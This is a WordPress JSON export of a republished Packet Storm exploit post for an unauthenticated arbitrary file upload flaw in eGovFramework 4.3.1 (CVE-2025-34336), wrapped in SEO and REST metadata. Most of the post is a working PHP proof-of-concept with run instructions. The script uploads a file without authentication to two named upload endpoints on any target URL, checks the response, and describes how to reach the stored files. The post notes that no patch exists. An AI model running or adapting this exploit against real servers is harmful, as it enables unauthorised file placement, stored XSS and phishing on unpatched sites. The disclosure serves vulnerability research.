{"id":27191,"date":"2025-11-21T10:45:07","date_gmt":"2025-11-21T10:45:07","guid":{"rendered":"http:\/\/localhost\/?p=27191"},"modified":"2025-11-21T10:45:07","modified_gmt":"2025-11-21T10:45:07","slug":"egovframework-431-arbitrary-file-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27191","title":{"rendered":"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-21T16:17:41&#8243;,&#8221;description&#8221;:&#8221;eGovFramework&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-21T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-21T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211870&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34336&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : eGovFramework 4.3.1 Unauthenticated File Upload Allowing Arbitrary File Storage                                             |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/egovframe.go.kr\/eng\/ntt\/nttRead.do?menuNo=21\\u0026bbsId=101\\u0026nttId=1871                                                   |\\n    =============================================================================================================================================\\n    \\n    POC :\\n    \\n    [+] Pre-Auth File Upload Vulnerability in eGovFramework 4.3.1 (CVE-2025-34336)\\n    \\n    [+] A pre-authenticated arbitrary file upload vulnerability exists in\\n        EgovFrame web applications. The affected upload handlers allow remote\\n        unauthenticated users to upload files without proper validation,\\n        leading to arbitrary file storage on the server.\\n    \\n    [+] This issue can be exploited to place attacker-controlled files into\\n        the server filesystem, resulting in access to stored files via the public image preview endpoint.\\n    \\n    [+] Vulnerable Endpoints:\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n       \/utl\/wed\/insertImage.do\\n       \/utl\/wed\/insertImageCk.do\\n    \\n    [+] Impact:\\n        &#8212;&#8212;-\\n        An attacker can upload arbitrary files (TXT, HTML, JSON, images, etc.)\\n        without authentication. While code execution is not possible due to\\n        server-side restrictions, successful upload is enough to confirm the\\n        vulnerability and may lead to stored XSS, phishing, or information \\n        leakage depending on server configuration.\\n    \\n    [+] PoC (Safe Non-Malicious Upload):\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\\n        The following PHP proof-of-concept demonstrates a harmless TXT file\\n        upload to confirm the vulnerability.\\n    \\n    [+] Exploitation \/ How To Run The PoC\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n       1. Save the PoC as: poc.php\\n    \\n       2. Open a terminal or command prompt and run: php poc.php https:\/\/target-website.com\/\\n    \\n       3. If the server is vulnerable, the script will return:\\n       \\n    [+] Potential Vulnerability Detected!\\n    \\n       along with a JSON response containing \\&#8221;path\\&#8221; and \\&#8221;physical\\&#8221;.\\n    \\n       4. If these fields exist, the upload succeeded and the target is affectedby CVE-2025-34336.\\n    \\n    [+] This PoC is safe, non-malicious, and uploads only a TXT file used for proof-of-vulnerability purposes.\\n    \\n    ====================================================================\\n    \\n    [+] PayLoad :\\n    \\n    \\u003c?php\\n    \\n    if ($argc \\u003c 2) {\\n        echo \\&#8221;Usage: php poc.php https:\/\/target\\\\n\\&#8221;;\\n        exit;\\n    }\\n    \\n    $base = rtrim($argv[1], \\&#8221;\/\\&#8221;);\\n    \\n    $endpoints = [\\n        \\&#8221;\/utl\/wed\/insertImage.do\\&#8221;,\\n        \\&#8221;\/utl\/wed\/insertImageCk.do\\&#8221;\\n    ];\\n    \\n    $proof = \\&#8221;proof.txt\\&#8221;;\\n    file_put_contents($proof, \\&#8221;This is a harmless proof-of-vulnerability file.\\&#8221;);\\n    \\n    foreach ($endpoints as $ep) {\\n    \\n        $url = $base . $ep;\\n    \\n        echo \\&#8221;\\\\n========================================\\\\n\\&#8221;;\\n        echo \\&#8221;[*] Testing: $url\\\\n\\&#8221;;\\n    \\n        $post = [\\n            \\&#8221;uploadfile\\&#8221; =\\u003e new CURLFile($proof, \\&#8221;text\/plain\\&#8221;, \\&#8221;proof.txt\\&#8221;)\\n        ];\\n    \\n        $ch = curl_init();\\n        curl_setopt($ch, CURLOPT_URL, $url);\\n        curl_setopt($ch, CURLOPT_POST, true);\\n        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n    \\n        $response = curl_exec($ch);\\n        $code     = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n        curl_close($ch);\\n    \\n        echo \\&#8221;[HTTP $code] Response length: \\&#8221; . strlen($response) . \\&#8221;\\\\n\\&#8221;;\\n    \\n        if ($code == 200 \\u0026\\u0026 strpos($response, \\&#8221;path\\&#8221;) !== false \\u0026\\u0026 strpos($response, \\&#8221;physical\\&#8221;) !== false) {\\n            echo \\&#8221;[+] Potential Vulnerability Detected!\\\\n\\&#8221;;\\n            echo \\&#8221;[+] Raw JSON Response:\\\\n$response\\\\n\\&#8221;;\\n        } else {\\n            echo \\&#8221;[-] Not Vulnerable or WAF blocked.\\\\n\\&#8221;;\\n        }\\n    }\\n    \\n    echo \\&#8221;\\\\nDone.\\\\n\\&#8221;;\\n    \\n    ?\\u003e\\n    \\n    [+] Accessing Uploaded Files:\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n       Uploaded files can be accessed via:\\n    \\n       \/utl\/web\/imageSrc.do?path=ENC(&#8230;)\\u0026physical=ENC(&#8230;)\\u0026contentType=ENC(&#8230;)\\n    \\n    [+] Vendor Status:\\n        &#8212;&#8212;&#8212;&#8212;&#8211;\\n        No official patch available at the time of disclosure.\\n    \\n    [+] Recommendation:\\n        &#8212;&#8212;&#8212;&#8212;&#8212;\\n       Do not expose EgovFrame-based applications directly to the internet.\\n       Implement strict file validation and disable unauthenticated upload\\n       handlers.\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/211870&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:6.9,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:L\/SC:L\/VI:L\/SI:L\/VA:N\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/211870\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-21T16:17:41&#8243;,&#8221;description&#8221;:&#8221;eGovFramework&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-21T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-21T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211870&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34336&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title : eGovFramework 4.3.1 Unauthenticated File Upload Allowing Arbitrary File Storage |\\n | # Author : indoushka&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,48,12,21,13,53,7,11,5],"class_list":["post-27191","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-69","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27191\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-21T16:17:41&#8243;,&#8221;description&#8221;:&#8221;eGovFramework&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-21T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-21T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211870&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34336&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : eGovFramework 4.3.1 Unauthenticated File Upload Allowing Arbitrary File Storage |n | # Author : indoushka...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27191\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-21T10:45:07+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27191#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27191\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870\",\"datePublished\":\"2025-11-21T10:45:07+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27191\"},\"wordCount\":735,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.9\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27191#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27191\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27191\",\"name\":\"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-21T10:45:07+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27191#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27191\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27191#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27191","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-21T16:17:41&#8243;,&#8221;description&#8221;:&#8221;eGovFramework&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-21T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-21T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:211870&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-34336&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title : eGovFramework 4.3.1 Unauthenticated File Upload Allowing Arbitrary File Storage |n | # Author : indoushka...","og_url":"https:\/\/zero.redgem.net\/?p=27191","og_site_name":"zero redgem","article_published_time":"2025-11-21T10:45:07+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27191#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27191"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870","datePublished":"2025-11-21T10:45:07+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27191"},"wordCount":735,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.9","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27191#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27191","url":"https:\/\/zero.redgem.net\/?p=27191","name":"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-21T10:45:07+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27191#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27191"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27191#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 eGovFramework 4.3.1 Arbitrary File Upload_PACKETSTORM:211870"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27191"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27191\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27191"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27191"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}